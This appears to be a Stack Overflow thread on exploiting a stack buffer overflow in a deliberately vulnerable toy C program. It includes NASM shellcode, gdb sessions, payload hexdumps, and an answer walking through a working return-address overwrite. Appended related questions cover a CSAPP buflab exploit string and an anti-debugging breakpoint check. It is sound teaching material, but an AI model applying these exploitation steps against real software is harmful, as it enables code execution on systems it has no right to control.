I am studying the stack-base buffer overflow vulnerability. I would like to inject the following shellcode I wrote:
BITS 64
jmp short one
two:
pop rcx
xor rax,rax
mov al, 4
xor rbx, rbx
inc rbx
xor rdx, rdx
mov dl, 15
int 0x80
mov al, 1
dec rbx
int 0x80
one:
call two
db "Hello, Friend.\n", 0x0a
I disabled ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) and compiled the program using -fno-stack-protector -z execstack, but still when I run the command:
root#computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')
this is what I get:
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault
The offset (64) is calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian of 0x7fffffffe76b, the env-var in which the shellcode is in.
I also hexdumped the injected program, making sure no null bytes were present:
00000000 eb 1a 59 48 31 c0 b0 04 48 31 db 48 ff c3 48 31 |..YH1...H1.H..H1|
00000010 d2 b2 0f cd 80 b0 01 48 ff cb cd 80 e8 e1 ff ff |.......H........|
00000020 ff 48 65 6c 6c 6f 2c 20 46 72 69 65 6e 64 2e 5c |.Hello, Friend.\|
00000030 6e 0a |n.|
00000032
The address was calculated using:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int pl = strlen(*argv);
char *addr = getenv(*++argv);
addr += (pl - strlen(*++argv))*2;
printf("\n%s # %p\n\n", *--argv, addr);
}
A changed version of the program in Jon Erickson's book.
This is the program with the vulnerability:
//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void hidden(void){
printf("Welcome to the dark side, young padawan");
exit(0);
}
void welcome(char *s){
char buffer[50];
//int placeholder = 13;
strcpy(buffer, "Welcome ");
strcat(buffer, s);
printf("%s\n", buffer);
}
int main(int argc, char **argv){
if(--argc < 1){
printf("\nUsage: %s [NAME]\n\n", *argv);
exit(1);
}
welcome(*++argv);
}
Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):
(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdda0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddc0: 0x00000000 0x00000000 0xf7ffe180 0x00007fff
0x7fffffffddd0: 0x00000002 0x00000000 0x555551bf 0x00005555
0x7fffffffdde0: 0x00000000 0x00000000 0xffffe2cf 0x00007fff
0x7fffffffddf0: 0x636c6557 0x20656d6f 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0xafc394c2 0xc335b8c3
0x7fffffffde40: 0xff007fbc 0x00007fff 0x00000000 0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü
Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16 }
After the padding (0x41), the return address is ruined due to the double byte representation of \xff.
Can someone help me understand why I am not able to inject the shellcode?
First of all, use 64-bit code when exploiting a 64-bit executable. int 0x80 is the old 32-bit syscall interface.
Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding.
See below if you still want to use an environment variable.
Passing the shellcode in the buffer
I won't disable ASLR globally and instead rely on GDB setting the appropriate personality of the debugged process to individually disable ASLR.
Since the process read the string from the command line, this gets tricky (but not much) because the command line arguments will shift the stack pointer down (the bigger they are the lower the stack pointer will be) at the program entry-point (Linux saves environments variables and command line arguments above the stack).
This will change the actual address where the shellcode will be loaded.
So you first need to know how big the shellcode will be and for that you need to also know how much data is needed to overwrite the return address, you can do this by inspecting the disassembly of welcome.
For a function as simple as it is, objdump will suffice:
000000000000118b <welcome>:
118b: 55 push %rbp
118c: 48 89 e5 mov %rsp,%rbp
118f: 48 83 ec 50 sub $0x50,%rsp
1193: 48 89 7d b8 mov %rdi,-0x48(%rbp) ;message
1197: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
119b: 48 b9 57 65 6c 63 6f movabs $0x20656d6f636c6557,%rcx "Welcome "
11a2: 6d 65 20
11a5: 48 89 08 mov %rcx,(%rax)
11a8: c6 40 08 00 movb $0x0,0x8(%rax)
11ac: 48 8b 55 b8 mov -0x48(%rbp),%rdx ;message
11b0: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
11b4: 48 89 d6 mov %rdx,%rsi
11b7: 48 89 c7 mov %rax,%rdi
11ba: e8 91 fe ff ff call 1050 <strcat#plt> ;<--
11bf: 48 8d 45 c0 lea -0x40(%rbp),%rax
11c3: 48 89 c7 mov %rax,%rdi
11c6: e8 65 fe ff ff call 1030 <puts#plt>
11cb: 90 nop
11cc: c9 leave
11cd: c3 ret
You can see from my comment that the string buffer is at rbp-0x40.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome ", since this is a strcat, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.
Create a file with 72 bytes:
> python -c 'print("A"*72, end="")' > shellcode
Now use this file and GDB to find out the address of buffer:
> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13 strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0
0x7fffffffe2d0 is the address of buffer we now know:
The shellcode will be 8 bytes into buffer: 0x7fffffffe2d8
The return address will be 64 bytes into the shellcode (due to the consideration above).
It's time to write a shellcode and test it.
Since we are passing it in the command line it must also not contain new lines. However printing a new line is useful to flush the current line to stdout, so I used an ugly hack to make a new line at the end of the string at runtime.
The ugly shellcode code is:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0 ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!A" ;Last char is replaced with a new line
.len EQU $-message
Now assemble this:
> nasm shellcode.asm -o shellcode
and add any padding to make the file 64 bytes in size and then add the return address found above:
0000:0000 | 6A 01 58 6A 01 5F 48 8D 35 1C 01 01 01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01 C6 46 06 AA 80 76 06 A0 6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58 31 FF 0F 05 48 65 6C 6C 6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF FF 7F 00 00 | Øâÿÿÿ...
The stack is aligned on 16 bytes so as long as your shellcode length is between 0x40 and 0x4f (ends included) the shellcode address won't change.
Finally, run the shellcode:
> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]
Passing the shellcode in an envar
I assume you read the section above.
The address of the envar depends both on its size and the size of the command line argument.
The command line argument must be at least 64 + 6 bytes long (6 because the last two bytes of the return addresses are zero, so 6 suffices), and the
shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar is sensitive to the size of the shellcode to the byte granularity but it's sensitive to the size of the command line argument only on 16B steps (once this quantity was called a paragraph) because the stack is aligned on this size.
Write a 70-bytes file with a recognizable pattern, like:
0000:0000 | 43 41 4E 41 52 59 41 41 41 41 41 41 41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it pattern. This will simulate the shellcode and we now need it to have a few distinct bytes we can search for.
Create another 70-bytes file with another pattern:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
call it placeholder. This will simulate the command line argument.
Find where the envar is with gdb.
Remember that we need to pass 70 bytes as the command line argument to simulate the condition under which the program will be run.
The file placeholder will be used for this purpose and the filepattern will be used for searching its first bytes in memory.
> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19 if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f
Now edit placeholder and put the address found in its last 6 bytes:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF FF 7F | .ìÿÿÿ.
This is the final value of the command line argument.
Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!", 0x0a ;Last char is replaced with a new line
.len EQU $-message
TIMES 70 -($-$$) db 'A'
Assemble it:
> nasm shellcode.asm -o shellcode
We can now run it:
> SC=$(cat shellcode) gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]
How does it work?
Out strategy has been that of using GDB to replicate the program runtime conditions when it will be exploited.
In the first section we are interested in finding the address of buffer, we realized that this depends on the size of the command line arguments so we first found out the shellcode size by statically analyzing the program and then we found the address of buffer using a fake shellcode.
The exploitation itself is pretty basic, the stack is executable and the return address is simply overwritten to steer the execution.
In the second section, we are interested in finding the address of an envar value that the kernel places above the stack.
We proceed in the same manner, we use a fake command line argument, a fake shellcode with a recognizable pattern and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one but the shellcode is inside an envar (which allows for newlines and whatnot).
What are interested in finding the address
Related
So, I have the following c program:
#include <stdio.h>
#include <string.h>
int main(){
char arr[20];
//this is line 6
strcpy(arr,"Hello, world!\n");
printf(arr);
}
I compiled it using the following command:
gcc -g t2.c -o a2.out
After that I loaded it in gdb and tried setting breakpoints at line 6, at the strcpy function and at line 8. Sure enough, when setting the breakpoint at strcpy I got the following message : "Make breakpoint pending on future shared library load? (y or [n])". I answered "y" and got "Breakpoint 2 (strcpy) pending.".
After answering yes, and running through the program, Breakpoint 2 is never resolved, and the debugger jumps straight to Breakpoint 3 at printf.
I am using Intel syntax in my debugger. Other than that no custom settings. Can anyone tell why the Breakpoint at strcpy is never resolved?
Compilers such as gcc are deeply familiar with the semantics of string functions such as strcpy.
On x86-64 with your example, gcc 9 is generating inline assembly rather than a strcpy call even at
-O0. The breakpoint should work for most other functions.
x86-64 disassembly generated with gcc-9 (no strcpy call):
0000000000000000 <main>:
0: 48 83 ec 28 sub rsp,0x28
4: 48 b8 48 65 6c 6c 6f 2c 20 77 movabs rax,0x77202c6f6c6c6548
e: bf 01 00 00 00 mov edi,0x1
13: 48 89 04 24 mov QWORD PTR [rsp],rax
17: b8 21 0a 00 00 mov eax,0xa21
1c: 48 89 e6 mov rsi,rsp
1f: 66 89 44 24 0c mov WORD PTR [rsp+0xc],ax
24: 31 c0 xor eax,eax
26: c7 44 24 08 6f 72 6c 64 mov DWORD PTR [rsp+0x8],0x646c726f
2e: c6 44 24 0e 00 mov BYTE PTR [rsp+0xe],0x0
33: e8 00 00 00 00 call 38 <main+0x38> 34: R_X86_64_PLT32 __printf_chk-0x4
38: 31 c0 xor eax,eax
3a: 48 83 c4 28 add rsp,0x28
3e: c3 ret
I'm understanding the assembly and C code.
I have following C program , compiled to generate Object file only.
#include <stdio.h>
int main()
{
int i = 10;
int j = 22 + i;
return 0;
}
I executed following command
objdump -S myprogram.o
Output of above command is:
objdump -S testelf.o
testelf.o: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
#include <stdio.h>
int main()
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 10 sub $0x10,%esp
int i = 10;
6: c7 45 f8 0a 00 00 00 movl $0xa,-0x8(%ebp)
int j = 22 + i;
d: 8b 45 f8 mov -0x8(%ebp),%eax
10: 83 c0 16 add $0x16,%eax
13: 89 45 fc mov %eax,-0x4(%ebp)
return 0;
16: b8 00 00 00 00 mov $0x0,%eax
}
1b: c9 leave
1c: c3 ret
What is meant by number numeric before the mnemonic commands
i.e. "83 ec 10 " before "sub" command or
"c7 45 f8 0a 00 00 00" before "movl" command
I'm using following platform to compile this code:
$ lscpu
Architecture: i686
CPU op-mode(s): 32-bit
Byte Order: Little Endian
CPU(s): 1
On-line CPU(s) list: 0
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 1
Vendor ID: GenuineIntel
Those are x86 opcodes. A detailed reference, other than the ones listed in the comments above is available here.
For example the c7 45 f8 0a 00 00 00 before the movl $0xa,-0x8(%ebp) are hexadecimal values for the opcode bytes. They tell the CPU to move the immediate value of 10 decimal (as a 4-byte value) into the address located on the current stack 8-bytes above the stack frame base pointer. That is where the variable i from your C source code is located when your code is running. The top of the stack is at a lower memory address than the bottom of the stack, so moving a negative direction from the base is moving up the stack.
The c7 45 f8 opcodes mean to mov data and clear the arithmetic carry flag in the EFLAGS register. See the reference for more detail.
The remainder of the codes are an immediate value. Since you are using a little endian system, the least significant byte of a number is listed first, such that 10 decimal which is 0x0a in hexadecimal and has a 4-byte value of 0x0000000a is stored as 0a 00 00 00.
I'm doing the csapp buflab level 2. In this assignment I'm asked to input an exploit string using the getbuf() Mine looks like.
08048fe0 <getbuf>:
8048fe0: 55 push %ebp
8048fe1: 89 e5 mov %esp,%ebp
8048fe3: 83 ec 18 sub $0x18,%esp
8048fe6: 8d 45 f4 lea -0xc(%ebp),%eax
8048fe9: 89 04 24 mov %eax,(%esp)
8048fec: e8 6f fe ff ff call 8048e60 <Gets>
8048ff1: b8 01 00 00 00 mov $0x1,%eax
8048ff6: c9 leave
8048ff7: c3 ret
8048ff8: 90 nop
8048ff9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
And the bang() checks the global_value,
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
}
So I find the address:
0804a1dc <global_value>:
804a1dc: 00 00 00 00
And my exploit string looks like:
00000000 <.text>:
0: c7 05 dc a1 04 08 6c movl $0x6355476c,0x804a1dc
7: 47 55 63
a: 68 60 8d 04 08 push $0x8048d60
f: c3 ret
Then I search the address of the input string(it should be on the stack)
Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb)
So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff
However, I still get the result of segmentation fault. The result shows that I entered the right address, and I successfully passed level 0&1 using same strategy, I don't understand where I did wrong...
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0xa1dc05c7
0xffffb3b0: 0x476c0804 0x60686355 0xc308048d 0xffffb3ac
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb)
This is the succussful version of level 0(where I was asked to simply overwrite the return address with another function's starting address), notice that the addresses are in the same place, but level 2 just failed.
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0x00000000
0xffffb3b0: 0x00000000 0x00000000 0x00000000 0x08048e20
0xffffb3c0: 0x00000000 0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()
Thanks for any advice.
there is short program, the code is just as follow:
/* init.c */
#include <syscall.h>
#include <stdio.h>
int main()
{
int pid, exitstatus;
char shell[] = "shell";
char * args[] = {shell, 0};
while(1) {
pid = fork();
if (!pid)
exec(shell, args);
while (pid != wait(&exitstatus));
printf("Shell exited with status %d; starting it back up...", exitstatus);
}
}
compiled using gcc:
gcc -nostdinc -fno-strict-aliasing -fno-builtin -Wall -gstabs -Werror -O0 -m32 -c -o init.o init.c
using objdump to check the gstabs information of variable pid:
objdump -G init.o | grep pid
and the output of objdump:
37 LSYM 0 0 00000018 777 pid:(0,1)
When I try to print the memory address of pid within gdb:
print &pid
the result shows that &pid == $ebp + 0x18, but the assembly code is actually operate at memory address $esp + 0x18 as the assembly code will show below.
part of the disassemble output of init.o:
20 2c: c7 44 24 20 00 00 00 movl $0x0,0x20(%esp)
21 33: 00
22 34: e8 fc ff ff ff call 35 <main+0x35>
23 39: 89 44 24 18 mov %eax,0x18(%esp)
24 3d: 83 7c 24 18 00 cmpl $0x0,0x18(%esp)
25 42: 75 16 jne 5a <main+0x5a>
26 44: 8d 44 24 1c lea 0x1c(%esp),%eax
27 48: 89 44 24 04 mov %eax,0x4(%esp)
28 4c: 8d 44 24 26 lea 0x26(%esp),%eax
here at line 23:
mov %eax,0x18(%esp)
I think that what this instruction does is storing the result of fork() to variable pid, and it's using the address $esp + 0x18 not $ebp + 0x18 as gdb shows, as result, I can not get the desired result when I execute print pid in gdb (so as other local variables). So, how could this happen?
I am learning some anti-debugging techniques on Linux and found a snippet of code for checking 0xcc byte in memory to detect the breakpoints in gdb. Here is that code:
if ((*(volatile unsigned *)((unsigned)foo + 3) & 0xff) == 0xcc)
{
printf("BREAKPOINT\n");
exit(1);
}
foo();
But it does not work. I even tried to set a breakpoint on foo() function and observe the contents in memory, but did not see any 0xcc byte written for breakpoint. Here is what I did:
(gdb) b foo
Breakpoint 1 at 0x804846a: file p4.c, line 8.
(gdb) x/x 0x804846a
0x804846a <foo+6>: 0xe02404c7
(gdb) x/16x 0x8048460
0x8048460 <frame_dummy+32>: 0x90c3c9d0 0x83e58955 0x04c718ec 0x0485e024
0x8048470 <foo+12>: 0xfefae808 0xc3c9ffff .....
As you can see, there seems to be no 0xcc byte written on the entry point of foo() function. Does anyone know what's going on or where I might be wrong? Thanks.
Second part is easily explained (as Flortify correctly stated):
GDB shows original memory contents, not the breakpoint "bytes". In default mode it actually even removes breakpoints when debugger suspends and re-inserts them before continuing. Users typically want to see their code, not strange modified instructions used for breakpoints.
With your C code you missed breakpoint for few bytes. GDB sets breakpoint after function prologue, because function prologue is not typically what gdb users want to see. So, if you put break to foo, actual breakpoint will be typically located few bytes after that (depends on prologue code itself that is function dependent as it may or might not have to save stack pointer, frame pointer and so on). But it is easy to check. I used this code:
#include <stdio.h>
int main()
{
int i,j;
unsigned char *p = (unsigned char*)main;
for (j=0; j<4; j++) {
printf("%p: ",p);
for (i=0; i<16; i++)
printf("%.2x ", *p++);
printf("\n");
}
return 0;
}
If we run this program by itself it prints:
0x40057d: 55 48 89 e5 48 83 ec 10 48 c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
Now we run it in gdb (output re-formatted for SO).
(gdb) break main
Breakpoint 1 at 0x400585: file ../bp.c, line 6.
(gdb) info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x0000000000400585 in main at ../bp.c:6
(gdb) disas/r main,+32
Dump of assembler code from 0x40057d to 0x40059d:
0x000000000040057d (main+0): 55 push %rbp
0x000000000040057e (main+1): 48 89 e5 mov %rsp,%rbp
0x0000000000400581 (main+4): 48 83 ec 10 sub $0x10,%rsp
0x0000000000400585 (main+8): 48 c7 45 f8 7d 05 40 00 movq $0x40057d,-0x8(%rbp)
0x000000000040058d (main+16): c7 45 f4 00 00 00 00 movl $0x0,-0xc(%rbp)
0x0000000000400594 (main+23): eb 5a jmp 0x4005f0
0x0000000000400596 (main+25): 48 8b 45 f8 mov -0x8(%rbp),%rax
0x000000000040059a (main+29): 48 89 c6 mov %rax,%rsi
End of assembler dump.
With this we verified, that program is printing correct bytes. But this also shows that breakpoint has been inserted at 0x400585 (that is after function prologue), not at first instruction of function.
If we now run program under gdb (with run) and then "continue" after breakpoint is hit, we get this output:
(gdb) cont
Continuing.
0x40057d: 55 48 89 e5 48 83 ec 10 cc c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
This now shows 0xcc being printed for address 9 bytes into main.
If your hardware supports it, GDB may be using Hardware Breakpoints, which do not patch the code.
While I have not confirmed this via any official docs, this page indicates that
By default, gdb attempts to use hardware-assisted break-points.
Since you indicate expecting 0xCC bytes, I'm assuming you're running on x86 hardware, as the int3 opcode is 0xCC. x86 processors have a set of debug registers DR0-DR3, where you can program the address of data to cause a breakpoint exception. DR7 is a bitfield which controls the behavior of the breakpoints, and DR6 indicates the status.
The debug registers can only be read/written from Ring 0 (kernel mode). That means that the kernel manages these registers for you (via the ptrace API, I believe.)
However, for the sake of anti-debugging, all hope is not lost! On Windows, the GetThreadContext API allows you to get (a copy) of the CONTEXT for a (stopped) thread. This structure includes the contents of the DRx registers. This question is about how to implement the same on Linux.
This may also be a white lie that GDB is telling you... there may be a breakpoint there in RAM but GDB has noted what was there beforehand (so it can restore it later) and is showing you that, instead of the true contents of RAM.
Of course, it could also be using Hardware Breakpoints, which is a facility available on some processors. Setting h/w breakpoints is done by telling the processor the address it should watch out for (and trigger a breakpoint interrupt if it gets hit by the program counter while executing code).